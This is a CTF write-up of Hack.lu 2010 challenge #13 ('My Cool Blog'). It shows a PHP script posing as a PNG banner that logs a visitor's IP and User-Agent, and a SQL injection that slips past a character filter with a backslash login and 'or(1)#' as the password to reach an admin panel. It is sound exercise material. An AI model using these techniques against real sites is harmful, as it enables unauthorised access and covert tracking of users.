Hack.lu 2010 CTF #13 (My Cool Blog) writeup

Captain Rumbarrel is shocked because he found out that the filthy pirate Boozybold has stolen a whole shipment of rum! So Rumbarrel wants his revenge by hacking Boozybolds cool blog. Unfortunately he can not hack, so help him and get 250 gold coins!

From main page of his cool blog, we get three main points:

  • He has a browser check for his admin page. How can he check the browser? Obviously via User-Agent header
  • He has a banner rotation script that shows a random image on the main page
  • He has a script that auto-refreshes the main page in his browser every 3 minutes

To get into the admin page, we need to steal Boozybold’s browser identity. Thanks to banner rotation script, we can trick him into visiting our image. Let’s code a script that will sniff User-Agent:

<?php
$fo = fopen("log.log", "a");
fwrite($fo, "[" . date("j M Y G:i:s") . "] IP: " . 
  $_SERVER['REMOTE_ADDR'] . ", uag: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
header("Content-Type: image/png");
readfile("empty.png");
?>

(banner rotation script requires our url to end with .png and the returned data to be a PNG)

Then I spammed banner script a bit with my url (http://…/script.php/q.png) to raise my chances :)
And in a few minutes a cool line in the log appeared:

[27 Oct 2010 22:53:00] IP: 91.214.168.57,
                                      uag: CoolBlogBrowserToVisitACP

After using this user-agent identity (for example, in firefox), an admin login form appears:

If you experiment for a while, you can find out that symbols ‘=’, ‘-‘, ‘+’, space and ‘_’ are banned (shows “You try to hack me?”), and \ gives a mysql error:

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near
''\' AND password=''' at line 1

(dunno why a quote doesn’t cause an error, maybe it is escaped and \ is not)

If we use \ as the login and or(1)# as the password, the query turns into something like:

SELECT 1 FROM admins WHERE username = '\' AND password = 'or(1)#'

and we get into the adminko, where we are given the flag: Th1sW4snts0h4rdlittl3monk3y.
+253 :)

Leave a Reply

Your email address will not be published.